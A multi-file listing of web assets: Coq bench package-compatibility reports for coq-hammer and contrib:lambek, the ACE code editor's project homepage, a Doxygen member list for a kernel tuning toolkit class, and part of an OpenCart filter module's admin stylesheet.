<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>hammer: Not compatible 👼</title>
<link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" />
<link href="../../../../../bootstrap.min.css" rel="stylesheet">
<link href="../../../../../bootstrap-custom.css" rel="stylesheet">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
<script src="../../../../../moment.min.js"></script>
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div class="container">
<div class="navbar navbar-default" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li><a href="../..">clean / released</a></li>
<li class="active"><a href="">8.6 / hammer - 1.2+8.11</a></li>
</ul>
</div>
</div>
</div>
<div class="article">
<div class="row">
<div class="col-md-12">
<a href="../..">« Up</a>
<h1>
hammer
<small>
1.2+8.11
<span class="label label-info">Not compatible 👼</span>
</small>
</h1>
<p>📅 <em><script>document.write(moment("2022-01-01 06:30:20 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2022-01-01 06:30:20 UTC)</em><p>
<h2>Context</h2>
<pre># Packages matching: installed
# Name # Installed # Synopsis
base-bigarray base
base-num base Num library distributed with the OCaml compiler
base-threads base
base-unix base
camlp5 7.14 Preprocessor-pretty-printer of OCaml
conf-findutils 1 Virtual package relying on findutils
conf-perl 1 Virtual package relying on perl
coq 8.6 Formal proof management system
num 0 The Num library for arbitrary-precision integer and rational arithmetic
ocaml 4.03.0 The OCaml compiler (virtual package)
ocaml-base-compiler 4.03.0 Official 4.03.0 release
ocaml-config 1 OCaml Switch Configuration
ocamlfind 1.9.1 A library manager for OCaml
# opam file:
opam-version: "2.0"
maintainer: "palmskog@gmail.com"
homepage: "https://github.com/lukaszcz/coqhammer"
dev-repo: "git+https://github.com/lukaszcz/coqhammer.git"
bug-reports: "https://github.com/lukaszcz/coqhammer/issues"
license: "LGPL-2.1-only"
synopsis: "General-purpose automated reasoning hammer tool for Coq"
description: """
A general-purpose automated reasoning hammer tool for Coq that combines
learning from previous proofs with the translation of problems to the
logics of automated systems and the reconstruction of successfully found proofs.
"""
build: [make "-j%{jobs}%" {ocaml:version >= "4.06"} "plugin"]
install: [
[make "install-plugin"]
[make "test-plugin"] {with-test}
]
depends: [
"ocaml"
"coq" {>= "8.11" & < "8.12~"}
("conf-g++" {build} | "conf-clang" {build})
"coq-hammer-tactics" {= version}
]
tags: [
"category:Miscellaneous/Coq Extensions"
"keyword:automation"
"keyword:hammer"
"logpath:Hammer"
"date:2020-04-25"
]
authors: [
"Lukasz Czajka <lukaszcz@mimuw.edu.pl>"
"Cezary Kaliszyk <cezary.kaliszyk@uibk.ac.at>"
]
url {
src: "https://github.com/lukaszcz/coqhammer/archive/v1.2-coq8.11.tar.gz"
checksum: "sha512=f533eeb42fcad00447c174839dbc1c7882e14167e87275121c9a0ccc7dba7f25da4589caf53e26d816e8e06cc3de2d91b0a2ef9133b6371a8318ac037c4a0792"
}
</pre>
<h2>Lint</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
</dl>
<h2>Dry install 🏜️</h2>
<p>Dry install with the current Coq version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam install -y --show-action coq-hammer.1.2+8.11 coq.8.6</code></dd>
<dt>Return code</dt>
<dd>5120</dd>
<dt>Output</dt>
<dd><pre>[NOTE] Package coq is already installed (current version is 8.6).
The following dependencies couldn't be met:
- coq-hammer -> coq >= 8.11 -> ocaml >= 4.05.0
base of this switch (use `--unlock-base' to force)
No solution found, exiting
</pre></dd>
</dl>
<p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam remove -y coq; opam install -y --show-action --unlock-base coq-hammer.1.2+8.11</code></dd>
<dt>Return code</dt>
<dd>0</dd>
</dl>
<h2>Install dependencies</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
</dl>
<h2>Install 🚀</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
</dl>
<h2>Installation size</h2>
<p>No files were installed.</p>
<h2>Uninstall 🧹</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Missing removes</dt>
<dd>
none
</dd>
<dt>Wrong removes</dt>
<dd>
none
</dd>
</dl>
</div>
</div>
</div>
<hr/>
<div class="footer">
<p class="text-center">
Sources are on <a href="https://github.com/coq-bench">GitHub</a> © Guillaume Claret 🐣
</p>
</div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="../../../../../bootstrap.min.js"></script>
</body>
</html>
|
public/js/ace/index.html
|
ishandutta2007/test
|
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>ACE - Ajax.org Cloud9 Editor</title>
<meta name="description" content=""/>
<meta name="keywords" content=""/>
<link href="doc/site/style.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" media="all and (max-device-width: 480px)" href="doc/site/iphone.css">
<link rel="stylesheet" media="all and (min-device-width: 481px) and (max-device-width: 1024px)" href="doc/site/iphone.css">
</head>
<body>
<div id="header">
<div class="content">
<div class="logo"></div>
<div class="title"></div>
<div class="signature">Previously Skywriter, Bespin</div>
</div>
</div>
<div id="wrapper">
<div class="content">
<div class="column1">
<a href="http://github.com/ajaxorg/ace"><div class="fork_on_github"></div></a>
<div class="menu">
<h4>User Resources</h4>
<ul class="menu-list">
<li><a href="http://groups.google.com/group/ace-discuss">Ace Google Group</a></li>
<li><a href="http://groups.google.com/group/ace-internals">Ace Core Google Group</a></li>
<li><a href="irc://irc.freenode.net/%23ace">irc.freenode.net #ace</a></li>
</ul>
<h4>Related Projects</h4>
<ul class="menu-list">
<li><a href="https://github.com/joewalker/gcli">GCLI</a></li>
<li><a href="https://github.com/mozilla/dryice">DryIce</a></li>
<li><a href="https://github.com/cadorn/ace-extjs">Ace wrapper for ExtJS</a></li>
<li><a href="https://github.com/daveho/AceGWT">Ace wrapper for GWT</a></li>
</ul>
<h4>Projects Using Ace</h4>
<ul class="menu-list">
<li><a href="https://github.com/ajaxorg/cloud9">Cloud9 IDE</a></li>
<li><a href="https://github.com/blog/905-edit-like-an-ace">GitHub</a></li>
<li><a href="https://github.com/Gozala/sky-edit">Sky Edit</a></li>
<li><a href="http://www.bluegriffon.org/">Blue Griffon</a></li>
<li><a href="http://rstudio.org/">RStudio</a></li>
<li><a href="http://www.playmycode.com/">Play My Code</a></li>
<li><a href="http://demo.qooxdoo.org/devel/playground/#">Qooxdoo playground</a></li>
<li><a href="http://ext.radiantcms.org/extensions/264-ace">Radiant CMS</a></li>
<li><a href="http://developercompanion.com/">Developer Companion</a></li>
<li><a href="https://builder.addons.mozilla.org/">Mozilla Add-on Builder</a></li>
<li><a href="http://www.pythonanywhere.com/">PythonAnywhere</a></li>
<li><a href="http://shiftedit.net/">shiftEdit</a></li>
<li><a href="http://www.akshell.com/">Akshell</a></li>
<li><a href="http://beanstalkapp.com/">beanstalk</a></li>
<li><a href="http://neutronide.com/">Neutron IDE</a></li>
<li><a href="https://addons.mozilla.org/en-US/firefox/addon/acebug/">Acebug</a></li>
<li><a href="http://www.weecod.com">Weecod</a></li>
<li><a href="http://www.applaudcloud.com">AppLaud Cloud</a></li>
<li><a href='http://rubymonk.com'>RubyMonk</a></li>
</ul>
<h4>Syntax Highlighters</h4>
<ul class="menu-list">
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">Javascript</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">HTML</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">CSS</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">XML</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">Python</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">PHP</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">Java</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">Ruby</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">C++</a></li>
<li><a href="https://github.com/ajaxorg/ace/tree/master/lib/ace/mode">CoffeeScript</a></li>
</ul>
</div>
</div>
<div class="column2">
<p id="first">Ace is a standalone code editor written in JavaScript. Our goal is to create a web based code editor that matches and extends the features, usability and performance of existing native editors such as TextMate, Vim or Eclipse. It can be easily embedded in any web page and JavaScript application. Ace is developed as the primary editor for <a href="http://www.cloud9ide.com">Cloud9 IDE</a> and the successor of the Mozilla Skywriter (Bespin) Project.</p>
<h2>Features</h2>
<div class="divider"></div>
<ul class="content-list">
<li><a href="http://pcwalton.blogspot.com/2010/11/syntax-highlighting-specification.html">Syntax highlighting</a></li>
<li>Auto indentation and outdent</li>
<li><a href="https://github.com/mozilla/gcli">An optional command line</a></li>
<li>Work with huge documents (100,000 lines and more are no problem)</li>
<li>Fully customizable key bindings including VI and Emacs modes</li>
<li>Themes (TextMate themes can be imported)</li>
<li>Search and replace with regular expressions</li>
<li>Highlight matching parentheses</li>
<li>Toggle between soft tabs and real tabs</li>
<li>Displays hidden characters</li>
<li>Highlight selected word</li>
</ul>
<h2>Take Ace for a spin!</h2>
<div class="divider"></div>
<p>Check out the <a href="build/kitchen-sink.html">Ace live demo</a> or get a <a href="http://c9.io">Cloud9 IDE account</a> to experience Ace while editing one of your own GitHub projects.</p>
<h2>History</h2>
<div class="divider"></div>
<p>Previously known as “Bespin” or lately “Skywriter” it’s now known as Ace (Ajax.org Cloud9 Editor)! Bespin and Ace started as two independent projects both aiming to build a no compromise code editor component for the web. Bespin started as part of Mozilla Labs and was based on the <canvas> tag, while Ace is the Editor component of the <a href="http://cloud9ide.com">Cloud9 IDE</a> and is using the DOM for rendering. After the release of Ace at <a href="http://jsconf.eu/2010/speaker/kick_ass_code_editing_and_end.html">JSConf.eu 2010</a> in Berlin the Skywriter team decided to merge Ace with a simplified version of Skywriter's plugin system and some of Skywriter's extensibility points. All these changes have been merged back to Ace now, which supersedes Skywriter. Both <a href="http://ajax.org">Ajax.org</a> and <a href="http://mozilla.org">Mozilla</a> are actively developing and maintaining Ace.</p>
<h2>Getting the code</h2>
<div class="divider"></div>
<p>Ace is a community project. We actively encourage and support contributions. The Ace source code is <a href="http://github.com/ajaxorg/ace">hosted on GitHub</a>. It is released under the Mozilla tri-license (MPL/GPL/LGPL). This is the same license used by Firefox. This license is friendly to all kinds of projects, whether open source or not. Take charge of your editor and add your favorite language highlighting and keybindings!
<pre>git clone git://github.com/ajaxorg/ace.git</pre></p>
</div>
</div>
</div>
<div id="footer">
<ul class="menu-footer">
<li><a href="http://www.cloud9ide.com">About Cloud9</a></li>
<li>|</li>
<li>Ace & Cloud9 IDE are © <a href="http://ajax.org">Ajax.org</a> 2011</li>
</ul>
</div>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-18736001-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</body>
</html>
|
clean/Linux-x86_64-4.02.1-1.2.0/unstable/8.4.dev/contrib:lambek/dev/2014-11-19_21-53-26.html
|
coq-bench/coq-bench.github.io-old
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Coq bench</title>
<link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" />
<link href="../../../../../bootstrap.min.css" rel="stylesheet">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
<script src="../../../../../moment.min.js"></script>
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div class="container">
<div class="navbar navbar-default" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li><a href="../../..">Unstable</a></li>
<li><a href=".">8.4.dev / contrib:lambek dev</a></li>
<li class="active"><a href="">2014-11-19 21:53:26</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="../../../../../about.html">About</a></li>
</ul>
</div>
</div>
</div>
<div class="article">
<div class="row">
<div class="col-md-12">
<a href=".">« Up</a>
<h1>
contrib:lambek
<small>
dev
<span class="label label-info">Not compatible with this Coq</span>
</small>
</h1>
<p><em><script>document.write(moment("2014-11-19 21:53:26 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2014-11-19 21:53:26 UTC)</em><p>
<h2>Lint</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>ruby lint.rb unstable ../unstable/packages/coq:contrib:lambek/coq:contrib:lambek.dev</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
<dt>Output</dt>
<dd><pre>The package is valid.
</pre></dd>
</dl>
<h2>Dry install</h2>
<p>Dry install with the current Coq version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam install -y --dry-run coq:contrib:lambek.dev coq.8.4.dev</code></dd>
<dt>Return code</dt>
<dd>768</dd>
<dt>Duration</dt>
<dd>0 s</dd>
<dt>Output</dt>
<dd><pre>[NOTE] Package coq is already installed (current version is 8.4.dev).
The following dependencies couldn't be met:
- coq:contrib:lambek -> coq = dev
Your request can't be satisfied:
- Conflicting version constraints for coq
No solution found, exiting
</pre></dd>
</dl>
<p>Dry install without Coq, to test if the problem was incompatibility with the current Coq version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam remove -y coq; opam install -y --dry-run coq:contrib:lambek.dev</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>3 s</dd>
<dt>Output</dt>
<dd><pre>The following actions will be performed:
- remove coq.8.4.dev
=== 1 to remove ===
=-=- Removing Packages =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Removing coq.8.4.dev.
[WARNING] Directory /home/bench/.opam/system/lib/coq is not empty, not removing
[WARNING] Directory /home/bench/.opam/system/share/coq is not empty, not removing
The following actions will be performed:
- install coq.dev [required by coq:contrib:lambek]
- install coq:contrib:lambek.dev
=== 2 to install ===
=-=- Synchronizing package archives -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=- Installing packages =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Building coq.dev:
./configure -configdir /home/bench/.opam/system/lib/coq/config -mandir /home/bench/.opam/system/man -docdir /home/bench/.opam/system/doc -prefix /home/bench/.opam/system -usecamlp5 -camlp5dir /home/bench/.opam/system/lib/camlp5 -coqide no -no-native-compiler
make -j4
make install
Installing coq.dev.
Building coq:contrib:lambek.dev:
coq_makefile -f Make -o Makefile
make -j4
make install
Installing coq:contrib:lambek.dev.
</pre></dd>
</dl>
<h2>Install dependencies</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
</dl>
<h2>Install</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
</dl>
<h2>Installation size</h2>
<p>Data not available in this bench.</p>
<h2>Uninstall</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
<dt>Missing removes</dt>
<dd>
none
</dd>
<dt>Wrong removes</dt>
<dd>
none
</dd>
</dl>
</div>
</div>
</div>
<hr/>
<div class="footer">
<p class="text-center">
<small>Sources are on <a href="https://github.com/coq-bench">GitHub</a>. © Guillaume Claret.</small>
</p>
</div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="../../../../../bootstrap.min.js"></script>
</body>
</html>
|
docs/classktt_1_1_kernel_configuration-members.html
|
Fillo7/KTT
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.17"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Kernel Tuning Toolkit: Member List</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtreedata.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&dn=gpl-2.0.txt GPL-v2 */
$(document).ready(function() { init_search(); });
/* @license-end */
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">Kernel Tuning Toolkit
 <span id="projectnumber">1.3</span>
</div>
</td>
<td> <div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.17 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
<div id="nav-sync" class="sync"></div>
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&dn=gpl-2.0.txt GPL-v2 */
$(document).ready(function(){initNavTree('classktt_1_1_kernel_configuration.html',''); initResizable(); });
/* @license-end */
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div class="header">
<div class="headertitle">
<div class="title">ktt::KernelConfiguration Member List</div> </div>
</div><!--header-->
<div class="contents">
<p>This is the complete list of members for <a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a>, including all inherited members.</p>
<table class="directory">
<tr class="even"><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#a1a9aa254d4d163cf209f709142f2069f">getCompositionKernelGlobalSize</a>(const KernelId id) const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#ae19b1fd5fb0c9d5752778997568048a0">getCompositionKernelIds</a>() const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#a71473fe39fd1fc75248fcab1ca2126d2">getCompositionKernelLocalSize</a>(const KernelId id) const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#a7ea0ce2cbdf3614052713d6ebfac433a">getGlobalSize</a>() const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#aec361fe716a68548cf34ab1c9e47ba71">getGlobalSizes</a>() const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#a95c7cbeda8a09c400ee830074791f7f7">getLocalSize</a>() const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#abc356cadb462c2634ba9cccd8b9c5712">getLocalSizes</a>() const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#af5005dd2f2d8ee032a61704d01fd7809">getParameterPairs</a>() const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#ad610c2b3837bd8a20c1f4958442e3edc">isValid</a>() const</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#a6e8fb7526d1c826742885e60e3560b5a">KernelConfiguration</a>()</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#adb2ff93d548819d34ba2c85fb5fe2ade">KernelConfiguration</a>(const DimensionVector &globalSize, const DimensionVector &localSize, const std::vector< ParameterPair > &parameterPairs)</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"><span class="mlabel">explicit</span></td></tr>
<tr><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html#a73d227b5e8d4193effb7a43916c3bece">KernelConfiguration</a>(const std::map< KernelId, DimensionVector > &compositionGlobalSizes, const std::map< KernelId, DimensionVector > &compositionLocalSizes, const std::vector< ParameterPair > &parameterPairs)</td><td class="entry"><a class="el" href="classktt_1_1_kernel_configuration.html">ktt::KernelConfiguration</a></td><td class="entry"><span class="mlabel">explicit</span></td></tr>
</table></div><!-- contents -->
</div><!-- doc-content -->
<!-- start footer part -->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
<ul>
<li class="footer">Generated by
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.17 </li>
</ul>
</div>
</body>
</html>
|
admin/view/stylesheet/mf/css/style.css
|
monkdaf/skuter77-opencart
|
.mega-filter-pro table.attributes > tbody > tr:last-child > td, .mega-filter-pro table.attributes table.list tr:last-child td {
border-bottom: none;
}
.mega-filter-pro table.attributes table.form {
border: none;
margin: -5px;
}
.mega-filter-pro table.attributes table.list td {
border-right: none !important;
}
.mega-filter-pro table.attributes {
border-bottom: 1px solid #ccc;
}
.mega-filter-pro table.attributes > tbody > tr:hover, table.attributes > tbody > tr:hover td {
background: none !important;
}
.mega-filter-pro table.attributes table.list tr:hover td {
background-color: #FFFFCB !important;
}
.mega-filter-pro .table thead th {
background: #f3f3f3;
vertical-align: middle !important;
}
.mega-filter-pro .table.table-without-thead tbody tr:first-child td {
border-top: none;
}
.mega-filter-pro .vertical-middle {
vertical-align: middle !important;
}
.mega-filter-pro .table thead {
font-weight: bold;
}
.mega-filter-pro .box > .heading .buttons {
padding-top: 3px;
}
.mega-filter-pro .btn {
text-decoration: none;
}
.mega-filter-pro, .mega-filter-pro td, .mega-filter-pro th {
font-size: 13px;
}
.mega-filter-pro .tabs-left, .mega-filter-pro .tabs-right {
border-bottom: none;
padding-top: 40px;
}
.mega-filter-pro .tabs-left {
border-right: 1px solid #ddd;
}
.mega-filter-pro .tabs-right {
border-left: 1px solid #ddd;
}
.mega-filter-pro .tabs-left>li, .mega-filter-pro .tabs-right>li {
float: none;
margin-bottom: 2px;
}
.mega-filter-pro .tabs-left>li {
margin-right: -1px;
}
.mega-filter-pro .tabs-right>li {
margin-left: -1px;
}
.mega-filter-pro .tabs-left>li.active>a, .mega-filter-pro .tabs-left>li.active>a:hover, .mega-filter-pro .tabs-left>li.active>a:focus {
border-bottom-color: #ddd;
border-right-color: transparent;
}
.mega-filter-pro .tabs-right>li.active>a, .mega-filter-pro .tabs-right>li.active>a:hover, .mega-filter-pro .tabs-right>li.active>a:focus {
border-bottom: 1px solid #ddd;
border-left-color: transparent;
}
.mega-filter-pro .tabs-left>li>a {
border-radius: 4px 0 0 4px;
margin-right: 0;
display:block;
}
.mega-filter-pro .tabs-right>li>a {
border-radius: 0 4px 4px 0;
margin-right: 0;
}
.mega-filter-pro .modal {
overflow-y: hidden;
}
.mega-filter-pro .modal-body {
overflow-y: auto;
padding-bottom: 0;
}
.mega-filter-pro .modal-1000 .modal-dialog {
width: 960px;
}
.mega-filter-pro > .box > .content {
overflow: visible;
}
.mega-filter-pro .table-tbody tbody tr:first-child td {
border-top: none;
}
.mega-filter-pro .table-thead-bg thead td, .mega-filter-pro .table-thead-bg thead th {
background-color: #EFEFEF;
}
.mega-filter-pro .table-thead-bg thead td.btn-info, .mega-filter-pro .table-thead-bg thead th.btn-info {
background-color: #5BC0DE;
}
.mega-filter-pro #group-products td code {
color: #000;
font-weight: bold;
}
a.cke_button {
height: auto !important;
}
.mega-filter-pro .bs-callout {
border-left: 3px solid #eee;
margin: 0 0 20px 0;
padding: 20px;
}
.mega-filter-pro .bs-callout h3 {
margin-top: 0;
font-size: 16px;
font-weight: bold;
}
.mega-filter-pro .bs-callout-info {
background: #F4F8FA;
border-color: #5BC0DE;
}
.mega-filter-pro .bs-callout-info h3 {
color: #5BC0DE;
}
.mega-filter-pro blockquote p {
font-size: 14px;
}
.mega-filter-pro blockquote p input[type="checkbox"] {
vertical-align: middle;
margin-top: -2px;
}
.mega-filter-pro blockquote footer {
color: #686868;
font-size: 12px;
}
.mega-filter-pro blockquote footer code {
color: #000;
font-size: 12px;
}
.mega-filter-pro .bg-primary {
background-color: #428BCA;
color: #FFFFFF;
padding: 2px 5px;
}
.mega-filter-pro .bg-danger {
background-color: #F2DEDE;
padding: 2px 5px;
}
.mega-filter-pro label {
font-weight: normal;
}
.mega-filter-pro .sort-order-items {
list-style-type: none;
margin: 0;
padding: 0;
}
.mega-filter-pro .sort-order-items > li {
cursor: pointer;
display: block;
}
.mega-filter-pro .sort-order-items > li > span {
margin: 2px;
padding: 8px 10px;
